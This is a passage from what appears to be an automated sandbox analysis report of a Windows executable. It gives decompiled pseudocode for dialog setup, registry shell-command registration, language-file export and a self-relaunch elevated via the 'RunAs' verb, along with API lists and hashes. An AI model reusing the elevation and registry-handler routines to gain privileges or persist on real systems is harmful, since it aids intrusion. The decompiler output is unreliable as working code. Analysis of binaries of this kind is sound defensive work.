				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                                                                  0x00403c09
                                                                                                                                                                  0x00403c0c
                                                                                                                                                                  0x00403c11
                                                                                                                                                                  0x00403c1b
                                                                                                                                                                  0x00403c3f
                                                                                                                                                                  0x00403c4a
                                                                                                                                                                  0x00403c6e
                                                                                                                                                                  0x00403c96
                                                                                                                                                                  0x00403c9a
                                                                                                                                                                  0x00403ca6
                                                                                                                                                                  0x00403cb3
                                                                                                                                                                  0x00403cb8
                                                                                                                                                                  0x00403cc5
                                                                                                                                                                  0x00403cca
                                                                                                                                                                  0x00403cdd
                                                                                                                                                                  0x00403ce6
                                                                                                                                                                  0x00403cf8
                                                                                                                                                                  0x00403d11
                                                                                                                                                                  0x00403d26
                                                                                                                                                                  0x00403d3f
                                                                                                                                                                  0x00403d54
                                                                                                                                                                  0x00403d6d
                                                                                                                                                                  0x00403d76
                                                                                                                                                                  0x00403d88
                                                                                                                                                                  0x00403d9e
                                                                                                                                                                  0x00403db0
                                                                                                                                                                  0x00403db5
                                                                                                                                                                  0x00403dc4
                                                                                                                                                                  0x00403dc8
                                                                                                                                                                  0x00403dc9
                                                                                                                                                                  0x00403dca
                                                                                                                                                                  0x00403dda
                                                                                                                                                                  0x00403ddf
                                                                                                                                                                  0x00403de2
                                                                                                                                                                  0x00403de3
                                                                                                                                                                  0x00403df4
                                                                                                                                                                  0x00403df8
                                                                                                                                                                  0x00403df9
                                                                                                                                                                  0x00403dfa
                                                                                                                                                                  0x00403e0a
                                                                                                                                                                  0x00403e0f
                                                                                                                                                                  0x00403e12
                                                                                                                                                                  0x00403e13
                                                                                                                                                                  0x00403e22
                                                                                                                                                                  0x00403e26
                                                                                                                                                                  0x00403e28
                                                                                                                                                                  0x00403e29
                                                                                                                                                                  0x00403e39
                                                                                                                                                                  0x00403e3e
                                                                                                                                                                  0x00403e41
                                                                                                                                                                  0x00403e42
                                                                                                                                                                  0x00403e51
                                                                                                                                                                  0x00403e55
                                                                                                                                                                  0x00403e57
                                                                                                                                                                  0x00403e58
                                                                                                                                                                  0x00403e68
                                                                                                                                                                  0x00403e6d
                                                                                                                                                                  0x00403e70
                                                                                                                                                                  0x00403e71
                                                                                                                                                                  0x00403e71
                                                                                                                                                                  0x00403e87
                                                                                                                                                                  0x00403e8d
                                                                                                                                                                  0x00403e9e
                                                                                                                                                                  0x00403ea6
                                                                                                                                                                  0x00403eaf
                                                                                                                                                                  0x00403ebc

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1038210931-0
                                                                                                                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                                                                  0x00404415
                                                                                                                                                                  0x0040441d
                                                                                                                                                                  0x0040442c
                                                                                                                                                                  0x00404435
                                                                                                                                                                  0x004045b3
                                                                                                                                                                  0x004045b7
                                                                                                                                                                  0x004045b7
                                                                                                                                                                  0x0040444b
                                                                                                                                                                  0x00404452
                                                                                                                                                                  0x00404457
                                                                                                                                                                  0x00404460
                                                                                                                                                                  0x00404461
                                                                                                                                                                  0x00404462
                                                                                                                                                                  0x0040446d
                                                                                                                                                                  0x00404472
                                                                                                                                                                  0x00404473
                                                                                                                                                                  0x00404490
                                                                                                                                                                  0x004044a5
                                                                                                                                                                  0x004044b4
                                                                                                                                                                  0x004044b6
                                                                                                                                                                  0x004044b7
                                                                                                                                                                  0x004044bd
                                                                                                                                                                  0x004044cf
                                                                                                                                                                  0x004044db
                                                                                                                                                                  0x004044eb
                                                                                                                                                                  0x004044f1
                                                                                                                                                                  0x004044f6
                                                                                                                                                                  0x004044f9
                                                                                                                                                                  0x004044fe
                                                                                                                                                                  0x00404506
                                                                                                                                                                  0x00404507
                                                                                                                                                                  0x00404508
                                                                                                                                                                  0x00404510
                                                                                                                                                                  0x00404521
                                                                                                                                                                  0x00404532
                                                                                                                                                                  0x00404539
                                                                                                                                                                  0x00404547
                                                                                                                                                                  0x0040454e
                                                                                                                                                                  0x0040455b
                                                                                                                                                                  0x0040455c
                                                                                                                                                                  0x00404564
                                                                                                                                                                  0x0040456f
                                                                                                                                                                  0x00404570
                                                                                                                                                                  0x00404571
                                                                                                                                                                  0x0040457c
                                                                                                                                                                  0x0040457d
                                                                                                                                                                  0x00404588
                                                                                                                                                                  0x00404589
                                                                                                                                                                  0x0040458a
                                                                                                                                                                  0x004045a0
                                                                                                                                                                  0x004045a5
                                                                                                                                                                  0x00404521
                                                                                                                                                                  0x004044eb
                                                                                                                                                                  0x004045ab
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00404452
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                                                                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                                                                  • memset.MSVCRT ref: 004044CF
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                                                                  • memset.MSVCRT ref: 00404539
                                                                                                                                                                  • memset.MSVCRT ref: 0040454E
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                                                                  • API String ID: 486436031-734527199
                                                                                                                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                                                                  0x00406466
                                                                                                                                                                  0x0040647d
                                                                                                                                                                  0x00406484
                                                                                                                                                                  0x00406499
                                                                                                                                                                  0x004064a0
                                                                                                                                                                  0x004064af
                                                                                                                                                                  0x004064b4
                                                                                                                                                                  0x004064bb
                                                                                                                                                                  0x004064cd
                                                                                                                                                                  0x004064d2
                                                                                                                                                                  0x004064d4
                                                                                                                                                                  0x004064e4
                                                                                                                                                                  0x004064ea
                                                                                                                                                                  0x004064ea
                                                                                                                                                                  0x004064f3
                                                                                                                                                                  0x00406503
                                                                                                                                                                  0x00406514
                                                                                                                                                                  0x00406525
                                                                                                                                                                  0x0040653b
                                                                                                                                                                  0x0040654e
                                                                                                                                                                  0x00406568
                                                                                                                                                                  0x00406572
                                                                                                                                                                  0x0040657a
                                                                                                                                                                  0x00406582
                                                                                                                                                                  0x0040658a
                                                                                                                                                                  0x00406596

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00406484
                                                                                                                                                                  • memset.MSVCRT ref: 004064A0
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                  • API String ID: 3037099051-2314623505
                                                                                                                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                                                                                                                  0x00401c31
                                                                                                                                                                  0x00401c33
                                                                                                                                                                  0x00401c48
                                                                                                                                                                  0x00401c4f
                                                                                                                                                                  0x00401c61
                                                                                                                                                                  0x00401c68
                                                                                                                                                                  0x00401c74
                                                                                                                                                                  0x00401c79
                                                                                                                                                                  0x00401c7a
                                                                                                                                                                  0x00401c7b
                                                                                                                                                                  0x00401c84
                                                                                                                                                                  0x00401c89
                                                                                                                                                                  0x00401c8e
                                                                                                                                                                  0x00401c8f
                                                                                                                                                                  0x00401c9b
                                                                                                                                                                  0x00401ca6
                                                                                                                                                                  0x00401caf
                                                                                                                                                                  0x00401cb9
                                                                                                                                                                  0x00401cc0
                                                                                                                                                                  0x00401cc7
                                                                                                                                                                  0x00401cce
                                                                                                                                                                  0x00401cd5
                                                                                                                                                                  0x00401cdd
                                                                                                                                                                  0x00401ce0
                                                                                                                                                                  0x00401d14
                                                                                                                                                                  0x00401ce2
                                                                                                                                                                  0x00401ce8
                                                                                                                                                                  0x00401cf3
                                                                                                                                                                  0x00401cfe
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00401cfe
                                                                                                                                                                  0x00401d1b

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                                                                  • memset.MSVCRT ref: 00401C4F
                                                                                                                                                                  • memset.MSVCRT ref: 00401C68
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                                                                  • memset.MSVCRT ref: 00401C9B
                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                                                                  • API String ID: 903100921-3385179869
                                                                                                                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                                                                  0x00406216
                                                                                                                                                                  0x0040621b
                                                                                                                                                                  0x00406222
                                                                                                                                                                  0x0040625f
                                                                                                                                                                  0x00406263
                                                                                                                                                                  0x00406269
                                                                                                                                                                  0x00406271
                                                                                                                                                                  0x00406273
                                                                                                                                                                  0x00406289
                                                                                                                                                                  0x00406289
                                                                                                                                                                  0x0040628e
                                                                                                                                                                  0x0040628f
                                                                                                                                                                  0x004062a9
